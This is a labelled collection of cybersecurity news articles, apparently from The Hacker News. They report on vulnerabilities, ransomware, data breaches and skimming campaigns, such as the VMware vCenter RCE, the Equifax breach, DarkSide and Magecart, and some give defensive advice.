""I'm not the one on the news who is selling the Yahoo xss for 700$, you may noticed that his name is ""TheHell"" idk why that krebsonShitz is linking me to that attack! why i don't sell things I got here? while it's awesome stuff not just XSS!!! 2- I'm not planning to do any more leaks soon!""
ViruS_HimA is a good guy that lives for security and believes in what he does, I consider this hacks very useful for the victims, a lesson to learn, an opportunity to make treasure of errors that everyone could commit.
The real error in cases like this is to remain deaf to the alarms, Vurus_HimA closed the saying: ""Always be proactive not reactive in safeguarding your critical data.""
I totally share his thought.
",Vulnerability
Critical RCE Vulnerability Found in VMware vCenter Server — Patch Now!,https://thehackernews.com/2021/05/critical-rce-vulnerability-found-in.html,"VMware has rolled out patches to address a critical security vulnerability in vCenter Server that could be leveraged by an adversary to execute arbitrary code on the server.
Tracked as CVE-2021-21985 (CVSS score 9.8), the issue stems from a lack of input validation in the Virtual SAN (vSAN) Health Check plug-in, which is enabled by default in the vCenter Server. ""A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server,"" VMware said in its advisory.
VMware vCenter Server is a server management utility that's used to control virtual machines, ESXi hosts, and other dependent components from a single centralized location. The flaw affects vCenter Server versions 6.5, 6.7, and 7.0 and Cloud Foundation versions 3.x and 4.x. VMware credited Ricter Z of 360 Noah Lab for reporting the vulnerability.
The patch release also rectifies an authentication issue in the vSphere Client that affects Virtual SAN Health Check, Site Recovery, vSphere Lifecycle Manager, and VMware Cloud Director Availability plug-ins (CVE-2021-21986, CVSS score: 6.5), thereby allowing an attacker to carry out actions permitted by the plug-ins without any authentication.
While VMware is strongly recommending customers to apply the ""emergency change,"" the company has published a workaround to set the plug-ins as incompatible. ""Disablement of these plug-ins will result in a loss of management and monitoring capabilities provided by the plug-ins,"" the company noted.
""Organizations who have placed their vCenter Servers on networks that are directly accessible from the Internet [...] should audit their systems for compromise,"" VMware added. ""They should also take steps to implement more perimeter security controls (firewalls, ACLs, etc.) on the management interfaces of their infrastructure.""
CVE-2021-21985 is the second critical vulnerability that VMware has rectified in the vCenter Server. Earlier this February, it resolved a remote code execution vulnerability in a vCenter Server plug-in (CVE-2021-21972) that could be abused to run commands with unrestricted privileges on the underlying operating system hosting the server.
The fixes for the vCenter flaws also come after the company patched another critical remote code execution bug in VMware vRealize Business for Cloud (CVE-2021-21984, CVSS score: 9.8) due to an unauthorized endpoint that could be exploited by a malicious actor with network access to run arbitrary code on the appliance.
Previously, VMware had rolled out updates to remediate multiple flaws in VMware Carbon Black Cloud Workload and vRealize Operations Manager solutions.
",Vulnerability
Adobe releases open source malware classification tool,https://thehackernews.com/2012/04/adobe-releases-open-source-malware.html,"Adobe releases open source malware classification tool
Adobe Systems has released a malware classification tool in order to help security incident first responders, malware analysts and security researchers more easily identify malicious binary files.
The 'Adobe Malware Classifier' tool uses machine learning algorithms to classify Windows executable and dynamic link library (DLL) files as clean, malicious or unknown, Adobe security engineer Karthik Raman said in a recent blog post, Raman originally developed Malware Classifier for in-house use by Adobe's Product Security Incident Response (PSIRT) Team.
When run, the tool extracts seven key attributes from every analyzed binary file and compares them to data obtained by running the J48, J48 Graft, PART, and Ridor machine-learning algorithms on a set of 100,000 malicious programs and 16,000 clean ones, Raman said.
""Malware classification can be a difficult task for even experienced analysts, especially in the modern era of highly obfuscated code, binaries that are designed to evade scanners and anti-malware applications. Determining whether an odd binary is potentially malicious can be a frustrating and time-consuming task"".
It is available for download from SourceForge.
",Malware
Hackers Can Remotely Access Syringe Infusion Pumps to Deliver Fatal Overdoses,https://thehackernews.com/2017/09/hacking-infusion-pumps.html,"Internet-of-things are turning every industry into the computer industry, making customers think that their lives would be much easier with smart devices. However, such devices could potentially be compromised by hackers.
There are, of course, some really good reasons to connect certain devices to the Internet.
But does everything need to be connected? Of course, not—especially when it comes to medical devices.
Medical devices are increasingly found vulnerable to hacking. Earlier this month, the US Food and Drug Administration (FDA) recalled 465,000 pacemakers after they were found vulnerable to hackers.
Now, it turns out that a syringe infusion pump used in acute care settings could be remotely accessed and manipulated by hackers to impact the intended operation of the device, ICS-CERT warned in an advisory issued on Thursday.
An independent security researcher has discovered not just one or two, but eight security vulnerabilities in the Medfusion 4000 Wireless Syringe Infusion Pump, which is manufactured by Minnesota-based speciality medical device maker Smiths Medical.
The devices are used across the world for delivering small doses of medication in acute critical care, such as neonatal and pediatric intensive care and the operating room.
Some of these vulnerabilities discovered by Scott Gayou are high in severity that can easily be exploited by a remote attacker to ""gain unauthorized access and impact the intended operation of the pump.""
According to the ICS-CERT, ""Despite the segmented design, it may be possible for an attacker to compromise the communications module and the therapeutic module of the pump.""
The most critical vulnerability (CVE-2017-12725) has been given a CVSS score of 9.8 and is related to the use of hard-coded usernames and passwords to automatically establish a wireless connection if the default configuration is not changed.
The high-severity flaws include:
A buffer overflow bug (CVE-2017-12718) that could be exploited for remote code execution on the target device in certain conditions.
Lack of authentication (CVE-2017-12720) if the pump is configured to allow FTP connections.
Presence of hard-coded credentials (CVE-2017-12724) for the pump's FTP server.
Lack of proper host certificate validation (CVE-2017-12721), leaving the pump vulnerable to man-in-the-middle (MitM) attacks.
The remaining are medium severity flaws which could be exploited by attackers to crash the communications and operational modules of the device, authenticate to telnet using hard-coded credentials, and obtain passwords from configuration files.
These vulnerabilities impact devices that are running versions 1.1, 1.5 and 1.6 of the firmware, and Smiths Medical has planned to release a new product version 1.6.1 in January 2018 to address these issues.
But in the meantime, healthcare organizations are recommended to apply some defensive measures including assigning static IP addresses to pumps, monitoring network activity for malicious servers, installing the pump on isolated networks, setting strong passwords, and regularly creating backups until patches are released.
",Vulnerability
Equifax Data Breach: Steps You should Take to Protect Yourself,https://thehackernews.com/2017/09/equifax-data-breach.html,"Equifax has suffered one of the largest data breaches in history that has left highly sensitive data of as many as 143 million people—that's nearly half of the US population—in the hands of hackers.
Based on the company's investigation, some unknown hackers managed to exploit a security flaw on the Equifax website and gained unauthorized access to certain files between mid-May and July 2017.
The information accessed primarily include full names, birth dates, Social Security numbers, addresses and, in some cases, driver's license numbers—most of the information that's banks, insurance companies, and other businesses use to confirm a consumer identity.
The company added that 209,000 credit card numbers were also obtained by the attackers, along with ""certain dispute documents with personal identifying information for approximately 182,000 U.S. consumers.""
Equifax is one of the three major organizations in the United States that calculates credit scores, which means the company has access to an extraordinary amount of personal and financial information for virtually all American adults.
Here's How Roughly Equifax Handled the Massive Data Breach
For a second, keep aside the scope and severity of the data breach, and let's talk about the how Equifax handled the breach after discovering it and what all it did for its customers.
First of all, the third largest U.S. credit reporting firm took over five weeks to publically disclose the data breach, which began in mid-May that means the data of 143 million people were exposed for over 3 months.
What's more? Reportedly, three senior Equifax executives, namely John Gamble (CFO), Joseph Loughran and Rodolfo Ploder, were permitted to sell almost $2 million worth of their shares just days after the company learned of this massive hack.
However, the company officials told Bloomberg that the employees were unaware of the data breach at the time of the sale.
Wait there's even more: After revealing the data breach on Thursday, Equifax did not contact everyone who was affected, rather it asked customers to go to its special website to figure out whether they were affected by entering the last 6 digits of their SSN and last name.
But it's not that simple. The website is not giving a clear answer about whether or not your data may have been affected, but making it clear to those who were not exposed. It's confusing.
What Would Be Hackers Next Move?
With this data in hand, it's most likely that hackers are already selling your personal information on the dark web or attempting to extort the company, like cyber criminals do in most massive data breach cases.
The Game of Thrones hackers did the same by leaking upcoming episodes of the widely watched show after HBO refused to their $6 Million ransom demand for the 1.5 terabytes of data they claimed to have stolen from the company.
Same happened to Netflix in April this year when the company refused to meet 50 Bitcoins ransom demand of a hacking group calling itself The Dark Overlord, which then leaked 10 back-to-back episodes of the Season 5 premiere of Netflix's ""Orange Is the New Black.""
Although Equifax has not yet confirmed whether the hackers have contacted the company for any demand or not, the breach is major, and all 143 Million Americans quickly need to take action to protect themselves and their loved ones.
Here's what all you can do to Protect Yourself:
1. Enroll in TrustedID Premier
Equifax is offering a year of free credit monitoring and identity theft protection program for free for one year through TrustedID Premier that you should sign up if you are a US resident—the service is free whether or not you have been affected by the breach.
The program offers services such as Equifax credit report, 3 bureau credit file monitoring, Equifax credit report lock, Social Security number monitoring and up to $1M identity theft insurance.
However, Equifax's own identity protection service is not enough, you must follow below steps to help ensure you're doing everything to protect your identity.
2. Monitor your accounts
In upcoming days, the personal and payment cards details are likely to be sold in underground black markets, resulting in financial loss and identity theft to millions of customers.
So, users are advised to be vigilant in reviewing their bank account statements, checking for any changes in their personal information and reporting any unauthorized transactions to the respective bank.
3. Freeze Your Credit Report
Since your stolen Social Security number can be misused by hackers to open new accounts in your name or ruin your credit score, you should consider placing a credit freeze request.
Freezing your credit will make it difficult for anyone to open a new account in your name, as you (or anyone masquerading as you) will need the PIN that you got when you froze your credit to unfreeze your account.
To freeze your credit, contact these credit bureaus: Equifax: 1-800-349-9960, Experian: 1‑888‑397‑3742, and TransUnion: 1-888-909-8872.
4. Change your Passwords and Logins
Meanwhile, all customers are advised to reset their account passwords and login information on the website.
5. Watch out for tax season
It's important for you to know that identity thieves can use your stolen social security number to file fraudulent tax returns and get refunds.
So, you should consider filing your taxes early.
6. Watch Out for Scams
Users are strongly advised to be cautious if they receive any suspicious or unrecognised phone call, text message, or email from anyone saying you must pay taxes or a debt immediately—even if they provide your personal information.
7. Already Experienced Identity Theft? Here's what to do now:
If you have already a victim to the identity theft, visit the FTC Identity Theft Recovery website and fill in the form. The Federal Trade Commission will provide you with a specific identity theft report and ""to-do"" recovery plans.
",Data_Breaches
Ukraine Police Warns of New NotPetya-Style Large Scale CyberAttack,https://thehackernews.com/2017/10/ukraine-notpetya-cyberattack.html,"Remember NotPetya?
The Ransomware that shut down thousands of businesses, organisations and banks in Ukraine as well as different parts of Europe in June this year.
Now, Ukrainian government authorities are once again warning its citizens to brace themselves for next wave of ""large-scale"" NotPetya-like cyber attack.
According to a press release published Thursday by the Secret Service of Ukraine (SBU), the next major cyber attack could take place between October 13 and 17 when Ukraine celebrates Defender of Ukraine Day (in Ukrainian: День захисника України, Den' zakhysnyka Ukrayiny).
Authorities warn the cyber attack can once again be conducted through a malicious software update against state government institutions and private companies.
The attackers of the NotPetya ransomware also used the same tactic—compromising the update mechanism for Ukrainian financial software provider called MeDoc and swapping in a dodgy update including the NotPetya computer virus.
The virus then knocked computers in Ukrainian government agencies and businesses offline before spreading rapidly via corporate networks of multinational companies with operations or suppliers in eastern Europe.
Presentation by Alexander Adamov, CEO at NioGuard Security Lab
The country blamed Russia for the NotPetya attacks, while Russia denied any involvement.
Not just ransomware and wiper malware, Ukraine has previously been a victim of power grid attacks that knocked its residents out of electricity for hours on two different occasions.
The latest warning by the Ukrainian secret service told government and businesses to make sure their computers and networks were protected against any intrusion.
""SBU notifies about preparing for a new wave of large-scale attack against the state institutions and private companies. The basic aim—to violate normal operation of information systems, that may destabilize the situation in the country,"" the press release reads.
""The SBU experts received data that the attack can be conducted with the use of software updating, including public applied software. The mechanism of its realization will be similar to cyber-attack of June 2017.""
To protect themselves against the next large-scale cyber attack, the SBU advised businesses to follow some recommendations, which includes:
Updating signatures of virus protection software on the server and in the workstation computers.
Conducting redundancy of information, which is processed on the computer equipment.
Providing daily updating of system software, including Windows operating system of all versions.
Since the supply chain attacks are not easy to detect and prevent, users are strongly advised to keep regular backups of their important files on a separate drive or storage that are only temporarily connected for worst case scenarios.
Most importantly, always keep a good antivirus on your system that can detect and block any malware intrusion before it can infect your device, and keep it up-to-date for latest infection-detection.
",Cyber_Attack
LockerPin Ransomware Resets PIN and Permanently Locks Your SmartPhones,https://thehackernews.com/2015/09/android-lock-ransomware.html,"Your device's lock screen PIN is believed to keep your phone's contents safe from others, but sadly not from a new piece of ransomware that is capable of hijacking safety of your Android devices.
A group of security researchers has uncovered what is believed to be the first real example of malware that is capable to reset the PIN code on a device and permanently lock the owner out of their own smartphone or tablet.
This Android PIN-locking ransomware, identified as Android/Lockerpin.A, changes the infected device's lock screen PIN code and leaves victims with a locked mobile screen, demanding for a $500 (€450) ransom.
Here's the Kicker:
Since the lock screen PIN is reset randomly, so even paying the ransom amount won't give you back your device access, because even the attackers don't know the changed PIN code of your device, security researchers at Bratislava-based antivirus firm ESET warn.
LockerPIN, as dubbed by the researchers, being spread through an adult entertainment apps installed from third-party websites, warez forums, and torrents – outside of the official Google Play Store.
The app in question is Porn Droid, which is the second of its kind observed recently called Adult Player – another porn-themed Android app that takes selfies of its users and include them in its ransom messages.
How LockerPIN Works?
Once installed on the victim's smartphone, the app first tricks users into granting it device administrator rights. It does so by disguising itself as an ""Update patch installation"" window.
After gaining admin privileges, the malicious app goes on to change the user's lock screen PIN code, using a randomly generated number.
This random number is not even sent to the attacker, meaning even after victims pay the ransom; nobody can unlock the device's screen.
Though the majority of infected devices are detected within the United States, the researchers have spotted the infections worldwide.
How to Get Rid of this LockerPIN Ransomware?
Unfortunately, there is ""no effective way"" to regain access to infected devices without losing personal data.
Rebooting the device in Safe Mode and uninstalling the offending application or using Android Debug Bridge (ADB) alone won't solve the issue.
The only way to unlock the device and get rid of LockerPIN ransomware app is to perform a factory reset that would wipe out all the personal data and apps stored on your device.
Ransomware delivering through malicious apps are growing increasingly and becoming more sophisticated with time, and this newly discovered LockerPIN Ransomware proves the theory.
The bottom line:
To avoid falling victims to malicious apps like Porn Droid and Adult Player, the saving grace for users is:
Don't install apps outside of the Google Play Store.
Don't grant administrator privileges to apps unless you truly trust them.
",Malware
How Some Chinese Hackers Started Making Big Money,https://thehackernews.com/2015/10/hacking-news-china.html,"We know that Hackers hack for a variety of reasons:
...some hack to test their skills,
…some hack to gain recognition,
...some hack to make money,
...some hack to support their Nation-State strategy,
...and, some hack alone, and some hack in Groups.
And Chinese Hackers are the ones who are infamous for their dedication towards Hacking.
Chinese hacking groups are better known for attacking and stealing information, organized cyber crimes, theft of intellectual property and state-sponsored cyber espionage attacks.
But it seems that several Chinese hacker groups have now shifted their motive of hacking towards 'making money'.
How much Money Hackers Actually Make?
It is a known fact that hacking makes money, but how much?
Answer: At least $4,500,000/year from one malware campaign.
How? We often observe mobile and desktop applications bundled with Ad-displaying programs, called Adware, to generate revenue.
Just last week we reported about ""Kemoge Android Adware,"" disguising itself as popular apps, is making the rounds in as many as 20 countries.
Kemoge malware, whose origin is suspected from China, can root vulnerable Android devices, which practically allows hackers to take over victim's Android device.
Once installed, the malware automatically download other Apps it gets paid to promote.
But Kemoge adware is not alone, the researchers have discovered some it's variants that belong to the same malware family.
Chinese Adware Family Threatening your Android
In a recent blog post, Security experts at Cheetah Mobile company, developers of CM Security and Antivirus apps, detailed about how Chinese hackers are making millions of profits from underground App distribution chains.
Other members of the same family are:
Ghost Push
Braintest
Guaranteed Clicks
RetroTetri
All these malware under same illegal Mobile Marketing Industry Chain follow a similar modus operandi; which is:
Repackage popular apps to injected malicious code and Ad components
Bypass Google Play Store's Bouncer Security
Exploiting existing Android vulnerabilities to gain Admin-level permissions
Root users' devices that make them unable to uninstall the virus
And then promote malicious apps through legitimate channels
""As users are completely unable to uninstall these malicious apps, the virus developers soon get a massive number of active users."" Cheetah Mobile researcher said.
""With this user base, the virus developer is able to set up a marketing promotion company and become a mobile dealer. Then they have the qualifications to cooperate with ad sponsors, making money by distributing products for advertisers.""
These malicious apps were found on some famous App Stores, including Google Play, Aptoide and Mobogonie.
Some Critical Findings from their Research are:
This Virus family includes 4000 Samples
The Adware is affecting Android versions from 2.3 to 5.1.
More than 10,000 phone types and 2,742 brands have been affected.
The virus has affected more than 900,000 Android users in over 116 countries, especially Southeast Asia.
More than four suspicious domain names have been identified.
Tips for keeping your Android Device Safe
Users are advised to:
never click on suspicious links from emails or websites,
be careful what you download,
don't install apps without reviewing them,
inspect each and every permission an Android app asks for,
keep your Android device updated.
Read More:
China Admits It Has Army of Hackers
China arrested Hackers at U.S. Government Request
China Using A Powerful 'Great Cannon' Weapon to Censor The Internet
China Demands Tech Companies to give them Backdoor and Encryption Keys
To grab more of what China-based hacks and attacks are capable of, Follow us and Stay Tuned.
",Malware
DarkSide Ransomware Gang Extorted $90 Million from Several Victims in 9 Months,https://thehackernews.com/2021/05/darkside-ransomware-gang-extorted-90.html,"DarkSide, the hacker group behind the Colonial Pipeline ransomware attack earlier this month, received $90 million in bitcoin payments following a nine-month ransomware spree, making it one of the most profitable cybercrime groups.
""In total, just over $90 million in bitcoin ransom payments were made to DarkSide, originating from 47 distinct wallets,"" blockchain analytics firm Elliptic said. ""According to DarkTracer, 99 organisations have been infected with the DarkSide malware - suggesting that approximately 47% of victims paid a ransom, and that the average payment was $1.9 million.""
Of the total $90 million haul, the DarkSide's developer is said to have received $15.5 million in bitcoins, while the remaining $74.7 million was split among its various affiliates. FireEye's research into DarkSide's affiliate program had previously revealed that its creators take a 25% cut for payments under $500,000 and 10% for ransoms above $5 million, with the lion's share of the money going to the recruited partners.
Elliptic co-founder and chief scientist Dr. Tom Robinson said the ""split of the ransom payment is very clear to see on the blockchain, with the different shares going to separate Bitcoin wallets controlled by the affiliate and developer.""
What's more, an analysis of blockchain transactions uncovered the syndicate had made $17.5 million in the past three months alone, with roughly 10% of the profits coming from payouts made by chemical distribution company Brenntag (nearly $4.4 million) and Colonial Pipeline. The Georgia-headquartered firm said it paid 75 bitcoins ($4.4 million as of May 8) to restore access, CEO Joseph Blount told the Wall Street Journal.
DarkSide, which went operational in August 2020, is just one of many groups that operated as a service provider for other threat actors, or ""affiliates,"" who used its ransomware to extort targets in exchange for a cut of the profits, but not before threatening to release the data — a tactic known as double extortion.
But in a sudden turn of events, the prolific cybercrime cartel last week announced plans to wind up its Ransomware-as-a-Service (RaaS) affiliate program for good, claiming that its servers had been seized by law enforcement. Its bitcoin wallet was also emptied to an unknown account.
The fallout from the biggest known cyberattack on U.S. energy industry is only the latest example of how a spate of ransomware incidents are increasingly affecting the operations of critical infrastructure and emerging a national security threat. The events have also turned the spotlight on implementing necessary strategies to ensure vital functions remain operational in the event of a significant cyber disruption.
",Malware
Security hole allows anyone to hijack your Skype account,https://thehackernews.com/2012/11/security-hole-allows-anyone-to-hijack.html,"It looks like Skype has another big hole in their security. According to reports, a security hole makes Skype accounts vulnerable to hijacking. The security hole allows unauthorized users with knowledge of your Skype-connected email address to change the password on your Skype account, thus gaining control of it.
The hijack is triggered by signing up for a new Skype account using the email address of another registered user. No access to the victim's inbox is required one just simply needs to know the address. Creating an account this way generates a warning that the email address is already associated with another user, but crucially the voice-chat website does not prevent the opening of the new account.
Then hacker just have to ask for a password reset token , which Skype app will send automatically to your email, this allows a third party to redeem it and claim ownership of your original username and thus account. The issue was reportedly documented on Russian forums months ago, and appears to have been easy to exploit.
Skype appears to have pulled its password reset page, stopping this flaw in its tracks and said, ""We have had reports of a new security vulnerability issue. As a precautionary step we have temporarily disabled password reset as we continue to investigate the issue further. We apologize for the inconvenience but user experience and safety is our first priority""
For quick security of your account, users should change associated e-mail address of your Skype account.
",Vulnerability
Vulnerable Texas Transportation Site 'TxTag' leaves 1.2 Million Credit Cards at Risk,https://thehackernews.com/2014/04/vulnerable-texas-transportation-site.html,"Do you know, Why another major company is getting hacked every week? Because of poor policies, Laziness to Incident Response and lack in will-power to put efforts on applying important patches.
Some companies are not taking their security more seriously, and best suitable example for this is TxTag, an electronic toll collection systems in Texas operated by Texas Department of Transportation (TxDOT).
1.2 MILLION CREDIT CARD ARE AT RISK
Security researcher, David Longenecker claimed a serious flaw at TxTag website that exposes the active Credit Card Details and Personal Information of 1.2 Million Drivers including active TxTags (vehicle stickers with microchips, which are scanned by electronic readers on toll roads), Names, phone numbers, full residence addresses, email addresses, along with their complete Credit card numbers and Expiration date.
According to David, the account names could be easily predictable by anyone, which is typically an 8-digit number that begins with the number 2 and protected by only a 4-digit PIN Number, that could be itself another easy x-factor to abuse.
But their stupidity didn't end here, to make the case worst for their users; TxTag.org inexplicably stores the entire credit card details including Credit Card Numbers and expiration date, which meant to be partial visible to users, but available in the plaintext as the value of input field on the page source code.
""I have no indication credit cards have actually been stolen. I merely found and reported a flaw that could very easily be exploited to obtain this information."" he said.
NO LESSONS LEARNED FROM PREVIOUS CYBER ATTACK
Texas Department of Transportation had not learned any lesson from their past experiences with hackers. Exactly two years back, they themselves confirmed a ""cyber attack"" in which the hackers overloaded the TxTag back office accounts servers, but according to TxTag, no accounts were compromised at the time.
In the reply back in 2012, Karen Amacker, TxDOT spokesman said, ""Customer service and information security are of paramount importance to TxDOT. Cyberattackers recently tried to get into TxTag.org, but were not successful. All of our customers' information, including credit card information, remains secure.""
But this security and so called paramount importance is seems to be a dilemma for them as they did nothing to improve the data security of their users after facing an attack.
FLAW REPORTED, BUT YET NO RESPONSE
The Flaw has been reported by the researcher, but neither TxTag nor TxDOT have so far responded to any of his request for comment.
""The problem lies in the AutoPay Method screen. If you do not have a credit card or bank account stored for automatic payments, then financial data cannot be stolen through this manner."" david said.
We should understand that no one is safe when bad hackers are out to do some damage. You are always advised to don't be lazy with your passwords, set tough-to-guess and long passwords and don't store information online that you don't absolutely need to. Stay Tuned, Stay Safe.
",Data_Breaches
Android Clickjacking Rootkit Demonstrated,https://thehackernews.com/2012/07/android-clickjacking-rootkit.html,"Android Clickjacking Rootkit Demonstrated
Mobile security researchers have identified an aspect of Android 4.0.4 (Ice Cream Sandwich) and earlier models that clickjacking rootkits could exploit. Researchers at NC State in the US have developed a proof-of-concept prototype rootkit that attacks the Android framework and could be used to steal personal information.
What is clickjacking? It is a malicious technique that tricks users and is often used to take over computers, web cams, or snag confidential info that is revealed by users who thinks they are on an innocent webpage.
Like most Android malware, the rootkit can be distributed as a malicious app, opening up a host of potential vulnerabilities on any device on which it is installed. However, it functions in a different way.
The rootkit, which could be bundled with an app and is said to be undetectable by anti-virus packages, would allow an attacker to replace a smartphone's browser with a version that logs key strokes to capture bank card data and uploads them to a hacker-controlled website.
Jiang explained in a video in which he demonstrates the rootkit in action:
In a demonstration video, the rootkit is shown manipulating the apps on a smartphone. Such a program could be used by cybercriminals to replace an app with a malicious data stealing version that appears legitimate to the user.
""This would be a more sophisticated type of attack than we've seen before,"" says Jiang, ""But there is good news. Now that we've identified the problem, we can begin working on ways to protect against attacks like these.""
",Malware
How One Photo Could Have Hacked Your WhatsApp and Telegram Accounts,https://thehackernews.com/2017/03/hack-whatsapp-telegram-account.html,"Next time when someone sends you a photo of a cute cat or a hot chick on WhatsApp or Telegram then be careful before you click on the image to view — it might hack your account within seconds.
A new security vulnerability has recently been patched by two popular end-to-end encrypted messaging services — WhatsApp and Telegram — that could have allowed hackers to completely take over user account just by having a user simply click on a picture.
The hack only affected the browser-based versions of WhatsApp and Telegram, so users relying on the mobile apps are not vulnerable to the attack.
According to Checkpoint security researchers, the vulnerability resided in the way both messaging services process images and multimedia files without verifying that they might have hidden malicious code inside.
For exploiting the flaw, all an attacker needed to do was sending the malicious code hidden within an innocent-looking image. Once the victim clicked on the picture, the attacker could have gained full access to the victim's WhatsApp or Telegram storage data.
This eventually allowed attackers to take full access to the user's account on any browser, view and manipulate chat sessions, access victim's personal and group chats, photos, videos, audios, other shared files and contact lists as well.
Millions of WhatsApp and Telegram accounts could have been hacked using just a PHOTO!
CLICK TO TWEET
To make this attack widespread, the attacker can then send the malware-laden image to everyone on the victim's contact list, which could, eventually, mean that one hijacked account could be led to countless compromises by leapfrogging accounts.
Video Demonstration
The researchers also provided a video demonstration, given below which shows the attack in action.
Here's Why This Vulnerability Went Undetected:
Both WhatsApp and Telegram use end-to-end encryption for its messages to ensure that nobody, except the sender and the receiver, can read the messages in between.
However, this same end-to-end encryption security measure was also the source of this vulnerability.
Since the messages were encrypted on the side of the sender, WhatsApp and Telegram had no idea or a way of knowing, that malicious code was being sent to the receiver, and thus were unable to prevent the content from being running.
""Since messages were encrypted without being validated first, WhatsApp and Telegram were blind to the content, thus making them unable to prevent malicious content from being sent,"" the researchers writes in a blog post.
WhatsApp fixed the flaw within 24 hours on Thursday, March 8, while Telegram patched the issue on Monday.
Since the fixes have been applied on the server end, users don't have to update any app to protect themselves from the attack; instead, they just need a browser restart.
""It's a big vulnerability in a significant service,"" said Oded Vanunu, head of product vulnerability research at Check Point. ""Thankfully, WhatsApp and Telegram responded quickly and responsibly to deploy the mitigation against exploitation of this issue in all web clients.""
WhatsApp did not notice any abuse of the vulnerability, while Telegram claimed the flaw was less severe than WhatsApp, as it required the victim to right click on the image content and then open it in a new window or tab for the malicious code to run and exploit its users.
After fixing this flaw, content on the web versions of both WhatsApp and Telegram will now be validated before the end-to-end encryption comes into play, allowing malicious files to be blocked.
",Vulnerability
Cybercrime Group Asking Insiders for Help in Planting Ransomware,https://thehackernews.com/2021/08/cybercrime-group-asking-insiders-for.html,"A Nigerian threat actor has been observed attempting to recruit employees by offering them to pay $1 million in bitcoins to deploy Black Kingdom ransomware on companies' networks as part of an insider threat scheme.
""The sender tells the employee that if they're able to deploy ransomware on a company computer or Windows server, then they would be paid $1 million in bitcoin, or 40% of the presumed $2.5 million ransom,"" Abnormal Security said in a report published Thursday. ""The employee is told they can launch the ransomware physically or remotely. The sender provided two methods to contact them if the employee is interested—an Outlook email account and a Telegram username.""
Black Kingdom, also known as DemonWare and DEMON, attracted attention earlier this March when threat actors were found exploiting ProxyLogon flaws impacting Microsoft Exchange Servers to infect unpatched systems with the ransomware strain.
Abnormal Security, which detected and blocked the phishing emails on August 12, responded to the solicitation attempt by creating a fictitious persona and reached out to the actor on Telegram messenger, only to have the individual inadvertently spill the attack's modus operandi, which included two links for an executable ransomware payload that the ""employee"" could download from WeTransfer or Mega.nz.
""The actor also instructed us to dispose of the .EXE file and delete it from the recycle bin. Based on the actor's responses, it seems clear that he 1) expects an employee to have physical access to a server, and 2) he's not very familiar with digital forensics or incident response investigations,"" said Crane Hassold, director of threat intelligence at Abnormal Security.
Besides taking a flexible approach to their ransom demands, the plan is believed to have been concocted by the chief executive of a Lagos-based social networking startup, with the goal of using the siphoned funds to ""build my own company."" In one of the conversations that took place over the course of five days, the individual even took to calling himself ""the next Mark Zuckerberg.""
Also of particular note is the method of using LinkedIn to collect corporate email addresses of senior-level executives, once again highlighting how business email compromise (BEC) attacks originating from Nigeria continue to evolve and expose businesses to sophisticated attacks like ransomware.
""There's always been a blurry line between cyberattacks and social engineering, and this is an example of how the two are intertwined. As people become better at recognizing and avoiding phishing, it should be no surprise to see attackers adopt new tactics to accomplish their goals,"" Tim Erlin, vice president of product management and strategy at Tripwire, said.
""The idea of a disgruntled insider as a cybersecurity threat isn't new. As long as organizations require employees, there will always be some insider risk. The promise of getting a share of the ransom might seem attractive, but there's almost zero guarantee that this kind of complicity will actually be rewarded, and it's highly likely that someone taking this attacker up on their offer would get caught,"" Erlin added.
",Malware
e-Commerce Site Hackers Now Hiding Credit Card Stealer Inside Image Metadata,https://thehackernews.com/2020/06/image-credit-card-skimmers.html,"In what's one of the most innovative hacking campaigns, cybercrime gangs are now hiding malicious code implants in the metadata of image files to covertly steal payment card information entered by visitors on the hacked websites.
""We found skimming code hidden within the metadata of an image file (a form of steganography) and surreptitiously loaded by compromised online stores,"" Malwarebytes researchers said last week.
""This scheme would not be complete without yet another interesting variation to exfiltrate stolen credit card data. Once again, criminals used the disguise of an image file to collect their loot.""
The evolving tactic of the operation, widely known as web skimming or a Magecart attack, comes as bad actors are finding different ways to inject JavaScript scripts, including misconfigured AWS S3 data storage buckets and exploiting content security policy to transmit data to a Google Analytics account under their control.
Using Steganography to Hide Skimmer Code in EXIF
Banking on the growing trend of online shopping, these attacks typically work by inserting malicious code into a compromised site, which surreptitiously harvests and sends user-entered data to a cybercriminal's server, thus giving them access to shoppers' payment information.
In this week-old campaign, the cybersecurity firm found that the skimmer was not only discovered on an online store running the WooCommerce WordPress plugin but was contained in the EXIF (short for Exchangeable Image File Format) metadata for a suspicious domain's (cddn.site) favicon image.
Every image comes embedded with information about the image itself, such as the camera manufacturer and model, date and time the photo was taken, the location, resolution, and camera settings, among other details.
Using this EXIF data, the hackers executed a piece of JavaScript that was concealed in the ""Copyright"" field of the favicon image.
""As with other skimmers, this one also grabs the content of the input fields where online shoppers are entering their name, billing address, and credit card details,"" the researchers said.
Aside from encoding the captured information using the Base64 format and reversing the output string, the stolen data is transmitted in the form of an image file to conceal the exfiltration process.
Stating the operation might be the handiwork of Magecart Group 9, Malwarebytes added the JavaScript code for the skimmer is obfuscated using the WiseLoop PHP JS Obfuscator library.
This is not the first time Magecart groups have used images as attack vectors to compromise e-commerce websites. Back in May, several hacked websites were observed loading a malicious favicon on their checkout pages and subsequently replacing the legitimate online payment forms with a fraudulent substitute that stole user card details.
Abusing DNS Protocol to Exfiltrate Data from the Browser
But data-stealing attacks don't have to be necessarily confined to malicious skimmer code.
In a separate technique demonstrated by Jessie Li, it's possible to pilfer data from the browser by leveraging dns-prefetch, a latency-reducing method used to resolve DNS lookups on cross-origin domains before resources (e.g., files, links) are requested.
Called ""browsertunnel,"" the open-source software consists of a server that decodes messages sent by the tool, and a client-side JavaScript library to encode and transmit the messages.
The messages themselves are arbitrary strings encoded in a subdomain of the top domain being resolved by the browser. The tool then listens for DNS queries, collecting incoming messages, and decoding them to extract the relevant data.
Put differently, 'browsertunnel' can be used to amass sensitive information as users carry out specific actions on a webpage and subsequently exfiltrate them to a server by disguising it as DNS traffic.
""DNS traffic does not appear in the browser's debugging tools, is not blocked by a page's Content Security Policy (CSP), and is often not inspected by corporate firewalls or proxies, making it an ideal medium for smuggling data in constrained scenarios,"" Li said.
",Cyber_Attack
Skype Vulnerability Exposing User IP Addresses,https://thehackernews.com/2012/05/skype-vulnerability-exposing-user-ip.html,"Skype Vulnerability Exposing User IP Addresses
Skype is warning users following the launch of a site devoted to harvesting user IP addresses.The Skype IP-Finder site allowed third-parties to see a user's last known IP address by simply typing in a user name.
A script has been uploaded to Github that offers these options. According to the page, it can be used to lookup IP addresses of online Skype accounts, and return both the remote and the local IP of that account on a website.
